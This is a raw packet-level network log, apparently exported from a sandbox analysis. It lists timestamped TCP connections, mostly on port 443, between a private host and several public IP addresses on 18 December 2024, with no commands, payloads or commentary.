                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.409451008 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.417198896 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.417263985 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.417279005 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.424907923 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.424978018 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.424993038 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.432799101 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.432913065 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.432928085 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.441991091 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.442064047 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.442092896 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.457138062 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.457201958 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.457217932 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.508843899 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.508865118 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.554843903 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.563260078 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.567030907 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.567145109 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.567162037 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.573779106 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.573878050 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.573894978 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.588108063 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.588143110 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.588208914 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.588234901 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.588265896 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.599607944 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.599673986 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.599684000 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.599759102 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.599765062 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.608782053 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.608901024 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.608912945 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.608961105 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.614794970 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.614814997 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.614866018 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.621067047 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.621154070 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.621165991 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.621220112 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.624301910 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.624336958 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.624380112 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.630536079 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.630557060 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.630647898 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.636802912 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.636892080 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.643043041 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.643110037 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.645911932 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.645997047 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.683553934 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.683624983 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.685324907 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.685395002 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.685441971 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.685496092 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.685650110 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.685746908 CET44349821104.18.161.117192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:20.685832977 CET49821443192.168.2.16104.18.161.117
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:22.797305107 CET44349815104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:22.797398090 CET44349815104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:22.797471046 CET49815443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:23.807636023 CET49815443192.168.2.16104.21.32.225
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:23.807672024 CET44349815104.21.32.225192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:27.063092947 CET49826443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:27.063180923 CET44349826142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:27.063285112 CET49826443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:27.063544035 CET49826443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:27.063580990 CET44349826142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:28.860485077 CET44349826142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:28.861896038 CET49826443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:28.861951113 CET44349826142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:28.863215923 CET44349826142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:28.863552094 CET49826443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:28.863703966 CET49826443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:28.863703966 CET49826443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:28.863723993 CET44349826142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:28.863766909 CET44349826142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:28.906915903 CET49826443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:29.312365055 CET49827443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:29.312416077 CET44349827142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:29.312602997 CET49827443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:29.312772989 CET49827443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:29.312787056 CET44349827142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:29.594494104 CET44349826142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:29.598707914 CET44349826142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:29.598790884 CET49826443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:29.598879099 CET49826443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:29.598920107 CET44349826142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:31.021491051 CET44349827142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:31.023125887 CET49827443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:31.023142099 CET44349827142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:31.024286032 CET44349827142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:31.025356054 CET49827443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:31.025449038 CET44349827142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:31.027507067 CET49827443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:31.027507067 CET49827443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:31.027540922 CET44349827142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:31.753608942 CET44349827142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:31.756505966 CET44349827142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:31.756665945 CET49827443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:31.757003069 CET49827443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:31.757020950 CET44349827142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.303436995 CET49830445192.168.2.16142.250.181.65
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.425189018 CET44549830142.250.181.65192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.425287008 CET49830445192.168.2.16142.250.181.65
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.425348043 CET49830445192.168.2.16142.250.181.65
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.545169115 CET44549830142.250.181.65192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:34.241097927 CET49745443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:34.241298914 CET44349745142.250.181.110192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:34.241374969 CET49745443192.168.2.16142.250.181.110
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.349057913 CET49858443192.168.2.16172.217.19.228
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.349112988 CET44349858172.217.19.228192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.349364996 CET49858443192.168.2.16172.217.19.228
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.349458933 CET49858443192.168.2.16172.217.19.228
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.349468946 CET44349858172.217.19.228192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.224730015 CET44349858172.217.19.228192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.225020885 CET49858443192.168.2.16172.217.19.228
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.225032091 CET44349858172.217.19.228192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.226032972 CET44349858172.217.19.228192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.226133108 CET49858443192.168.2.16172.217.19.228
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.226422071 CET49858443192.168.2.16172.217.19.228
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.226480007 CET44349858172.217.19.228192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.226645947 CET49858443192.168.2.16172.217.19.228
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.266036034 CET49858443192.168.2.16172.217.19.228
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.266045094 CET44349858172.217.19.228192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.314049006 CET49858443192.168.2.16172.217.19.228
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.910254955 CET44349858172.217.19.228192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.910376072 CET44349858172.217.19.228192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.910521030 CET49858443192.168.2.16172.217.19.228
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.911778927 CET49858443192.168.2.16172.217.19.228
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:42.911801100 CET44349858172.217.19.228192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:44.802526951 CET49869443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:44.802628994 CET44349869142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:44.802788973 CET49869443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:44.803003073 CET49869443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:44.803039074 CET44349869142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.217036963 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.217139006 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.217149019 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.217181921 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.217268944 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.217271090 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.217487097 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.217503071 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.217633963 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.217670918 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.497126102 CET44349869142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.497565031 CET49869443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.497581005 CET44349869142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.497859001 CET44349869142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.498924017 CET49869443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.498969078 CET44349869142.250.181.132192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.544012070 CET49869443192.168.2.16142.250.181.132
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.911537886 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.911986113 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.911995888 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.913250923 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.913878918 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.914494991 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.914566040 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.914623022 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.915725946 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.915947914 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.916018963 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.917546988 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.917871952 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.917871952 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.917946100 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.917958975 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.917996883 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.955374002 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.957106113 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.957119942 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.973084927 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.973175049 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.007332087 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.021651983 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.591377020 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.591675043 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.591759920 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.591777086 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.598294020 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.598843098 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.598879099 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.598903894 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.598944902 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.599004984 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.599626064 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.599797964 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.600157976 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.600235939 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.600246906 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.600306988 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.609472990 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.609544992 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.609576941 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.611809015 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.616862059 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.616985083 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.616998911 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.624691010 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.624835968 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.624867916 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.634948969 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.635035992 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.635063887 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.658415079 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.689985991 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.714353085 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.718569040 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.718696117 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.718705893 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.720287085 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.767995119 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.768024921 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.768039942 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.768055916 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.785573006 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.785667896 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.785677910 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.793946028 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.794101000 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.794128895 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.797365904 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.797425032 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.797432899 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.802956104 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.803025961 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.803042889 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.806025028 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.806164026 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.806176901 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.811954975 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.812028885 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.812046051 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.814960957 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.815053940 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.815061092 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.822773933 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.822880983 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.822897911 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.828154087 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.828286886 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.828295946 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.836391926 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.836585999 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.836594105 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.839835882 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.839905977 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.839914083 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.849509954 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.849589109 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.849605083 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.852040052 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.852113008 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.852118969 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.862045050 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.862123013 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.862138987 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.864561081 CET44349874142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.864644051 CET49874443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:47.864651918 CET44349874142.250.181.46192.168.2.16
